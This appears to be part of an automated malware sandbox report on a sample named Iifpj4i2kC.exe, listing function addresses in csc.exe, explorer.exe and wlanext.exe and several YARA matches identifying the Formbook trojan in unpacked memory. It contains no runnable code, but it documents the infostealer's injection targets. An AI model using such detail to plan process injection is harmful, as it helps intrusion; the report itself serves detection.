          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EFDC05_2_055EFDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CADE05_2_055CADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E8DBF5_2_055E8DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05649C325_2_05649C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0C005_2_055D0C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568FCF25_2_0568FCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C0CF25_2_055C0CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05670CB55_2_05670CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05644F405_2_05644F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05612F285_2_05612F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568FF095_2_0568FF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055F0F305_2_055F0F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055C2FC85_2_055C2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DCFE05_2_055DCFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0564EFA05_2_0564EFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D1F925_2_055D1F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568FFB15_2_0568FFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D0E595_2_055D0E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568EE265_2_0568EE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568EEDB5_2_0568EEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E2E905_2_055E2E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D9EB05_2_055D9EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568CE935_2_0568CE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D99505_2_055D9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EB9505_2_055EB950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055E69625_2_055E6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0569A9A65_2_0569A9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D29A05_2_055D29A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D28405_2_055D2840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055DA8405_2_055DA840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0563D8005_2_0563D800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055FE8F05_2_055FE8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055D38E05_2_055D38E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055B68B85_2_055B68B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568FB765_2_0568FB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568AB405_2_0568AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05645BF05_2_05645BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0560DBF95_2_0560DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05686BD75_2_05686BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055EFB805_2_055EFB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05643A6C5_2_05643A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0568FA495_2_0568FA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05687A465_2_05687A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0567DAC65_2_0567DAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05615AA05_2_05615AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0566DAAC5_2_0566DAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_055CEA805_2_055CEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0510A0365_2_0510A036
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0510E5CD5_2_0510E5CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_051010825_2_05101082
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_0510B2325_2_0510B232
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05102D025_2_05102D02
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_051089125_2_05108912
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05105B305_2_05105B30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 5_2_05105B325_2_05105B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E1092326_2_0E109232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E103B306_2_0E103B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0E103B326_2_0E103B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E1080366_2_0E108036
          Source: C:\Windows\explorer.exeCode function: 6_2_0E0FF0826_2_0E0FF082
          Source: C:\Windows\explorer.exeCode function: 6_2_0E1069126_2_0E106912
          Source: C:\Windows\explorer.exeCode function: 6_2_0E100D026_2_0E100D02
          Source: C:\Windows\explorer.exeCode function: 6_2_0E10C5CD6_2_0E10C5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2362326_2_0E236232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2350366_2_0E235036
          Source: C:\Windows\explorer.exeCode function: 6_2_0E22C0826_2_0E22C082
          Source: C:\Windows\explorer.exeCode function: 6_2_0E230B326_2_0E230B32
          Source: C:\Windows\explorer.exeCode function: 6_2_0E230B306_2_0E230B30
          Source: C:\Windows\explorer.exeCode function: 6_2_0E22DD026_2_0E22DD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2339126_2_0E233912
          Source: C:\Windows\explorer.exeCode function: 6_2_0E2395CD6_2_0E2395CD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FA3527_2_037FA352
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038003E67_2_038003E6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0374E3F07_2_0374E3F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037E02747_2_037E0274
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037C02C07_2_037C02C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037C81587_2_037C8158
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038001AA7_2_038001AA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037DA1187_2_037DA118
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037301007_2_03730100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037F81CC7_2_037F81CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037407707_2_03740770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037647507_2_03764750
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0373C7C07_2_0373C7C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0375C6E07_2_0375C6E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038005917_2_03800591
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037405357_2_03740535
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037F24467_2_037F2446
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037EE4F67_2_037EE4F6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FAB407_2_037FAB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037F6BD77_2_037F6BD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0373EA807_2_0373EA80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037569627_2_03756962
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380A9A67_2_0380A9A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037429A07_2_037429A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0374A8407_2_0374A840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037428407_2_03742840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0376E8F07_2_0376E8F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037268B87_2_037268B8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037B4F407_2_037B4F40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03760F307_2_03760F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03782F287_2_03782F28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0374CFE07_2_0374CFE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03732FC87_2_03732FC8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037BEFA07_2_037BEFA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03740E597_2_03740E59
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FEE267_2_037FEE26
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FEEDB7_2_037FEEDB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03752E907_2_03752E90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FCE937_2_037FCE93
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0374AD007_2_0374AD00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0373ADE07_2_0373ADE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03758DBF7_2_03758DBF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03740C007_2_03740C00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03730CF27_2_03730CF2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037E0CB57_2_037E0CB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0372D34C7_2_0372D34C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037F132D7_2_037F132D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0378739A7_2_0378739A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037E12ED7_2_037E12ED
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0375B2C07_2_0375B2C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037452A07_2_037452A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0372F1727_2_0372F172
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0377516C7_2_0377516C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0374B1B07_2_0374B1B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B16B7_2_0380B16B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037F70E97_2_037F70E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FF0E07_2_037FF0E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037EF0CC7_2_037EF0CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037470C07_2_037470C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FF7B07_2_037FF7B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037F16CC7_2_037F16CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037F75717_2_037F7571
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037DD5B07_2_037DD5B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037314607_2_03731460
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FF43F7_2_037FF43F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FFB767_2_037FFB76
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037B5BF07_2_037B5BF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0377DBF97_2_0377DBF9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0375FB807_2_0375FB80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037B3A6C7_2_037B3A6C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FFA497_2_037FFA49
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037F7A467_2_037F7A46
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037EDAC67_2_037EDAC6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037DDAAC7_2_037DDAAC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03785AA07_2_03785AA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037499507_2_03749950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0375B9507_2_0375B950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037AD8007_2_037AD800
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037438E07_2_037438E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FFF097_2_037FFF09
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FFFB17_2_037FFFB1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03741F927_2_03741F92
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03749EB07_2_03749EB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037F7D737_2_037F7D73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037F1D5A7_2_037F1D5A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03743D407_2_03743D40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0375FDC07_2_0375FDC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037B9C327_2_037B9C32
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_037FFCF27_2_037FFCF2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EEEB717_2_00EEEB71
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00ED2D887_2_00ED2D88
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00ED2D907_2_00ED2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00ED9E607_2_00ED9E60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00EEDE5F7_2_00EEDE5F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_00ED2FB07_2_00ED2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A5A0367_2_03A5A036
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A55B307_2_03A55B30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A55B327_2_03A55B32
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A5B2327_2_03A5B232
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A589127_2_03A58912
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A510827_2_03A51082
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A5E5CD7_2_03A5E5CD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03A52D027_2_03A52D02
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 03787E54 appears 98 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 037BF290 appears 105 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 00FD650B appears 96 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 03775130 appears 36 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0372B970 appears 272 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 037AEA12 appears 86 times
          Source: C:\Users\user\Desktop\Iifpj4i2kC.exeCode function: String function: 00007FF67FA4C1A0 appears 63 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05605130 appears 36 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05617E54 appears 96 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 0564F290 appears 105 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 0563EA12 appears 86 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 055BB970 appears 268 times
          Source: Iifpj4i2kC.exeStatic PE information: invalid certificate
          Source: Iifpj4i2kC.exeBinary or memory string: OriginalFilename vs Iifpj4i2kC.exe
          Source: Iifpj4i2kC.exe, 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCompareLessThanScalarPaddedReference.dllj% vs Iifpj4i2kC.exe
          Source: Iifpj4i2kC.exe, 00000000.00000000.2109641000.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCompareLessThanScalarPaddedReference.dllj% vs Iifpj4i2kC.exe
          Source: Iifpj4i2kC.exeBinary or memory string: OriginalFilenameCompareLessThanScalarPaddedReference.dllj% vs Iifpj4i2kC.exe
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
